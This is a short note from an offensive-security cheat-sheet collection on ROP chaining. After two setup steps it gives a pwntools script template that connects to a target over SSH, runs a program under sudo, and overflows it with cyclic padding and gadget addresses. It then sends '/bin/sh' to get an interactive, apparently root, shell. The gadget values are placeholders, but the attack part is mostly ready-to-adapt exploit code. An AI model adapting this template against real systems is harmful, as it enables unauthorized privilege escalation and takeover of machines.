killchain-compendium/Exploits/Binaries/Ropping.md

ROP Chaining

Usage

• Find cyclic buffer size
• Find gadgets via ropper or even better ropstar

Example

from pwn import *

s = ssh(host="$TARGET_IP", user="<user>", keyfile="", password="")
p = s.process(['sudo', '<process>'])

offset=<found_offset_len>

# take the ropchain from ropstar
payload = cyclic(offset)
payload += p64(0x4711)
payload += p64(0x235)
payload += p64(0x007)

print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')